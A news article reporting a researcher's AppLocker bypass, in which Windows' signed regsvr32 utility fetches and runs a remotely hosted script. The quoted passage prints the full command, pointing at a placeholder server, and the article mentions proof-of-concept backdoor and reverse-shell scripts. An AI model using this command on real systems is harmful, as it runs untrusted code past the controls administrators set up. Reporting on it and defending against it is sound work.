Researcher Bypasses Windows AppLocker’s Security to Execute Remote Scripts
A new exploit has been discovered in Windows AppLocker – used to blacklist or whitelist applications – that could allow hackers to bypass your system’s safeguards.
AppLocker exploit bypasses Windows’ app security safeguards
Microsoft introduced AppLocker in Windows 7 and Windows Server 2008 R2 that allows administrators to specify which users or groups can run particular applications within an organization. Casey Smith, a security researcher, has discovered an exploit in Windows AppLocker that can be bypassed to execute remote scripts on a machine. Using Regsvr32, a command line utility designed for registering DLLs in the registry, an attacker can bypass Windows AppLocker restrictions.
The amazing thing here is that regsvr32 is already proxy aware, uses TLS, follows redirects, etc…And.. You guessed a signed, default MS binary. Whohoo.
So, all you need to do is host your .sct file at a location you control. From the target, simply execute
regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll
Its not well documented that regsvr32.exe can accept a url for a script.
Smith was looking for a way to register a script to bypass AppLocker and discovered that you could get around Applocker if you instruct Regsvr32 to point to a remotely hosted file, such as a script, allowing your system to run whichever app you want, bypassing system restrictions. This technique doesn’t require administrative privileges, nor does it alter the registry, making it difficult for admins to detect any changes. There is no patch available yet, however, Microsoft is expected to roll out a patch very soon. In the meantime, users can block Regsvr32.exe with Windows Firewall.
Windows AppLocker is considered one of the most important security features of the operating system. When talking about Enhanced Mitigation Experience Toolkit (EMET) for the enterprise, Microsoft said earlier this year that AppLocker in Windows 10 provides even better security than EMET.
You can visit the researcher’s blog to read more details of this exploit and the proof-of-concept scripts that can be loaded using Regsvr32 to open a backdoor or a reverse shell over HTTP. We will update this space as Microsoft responds to this serious vulnerability.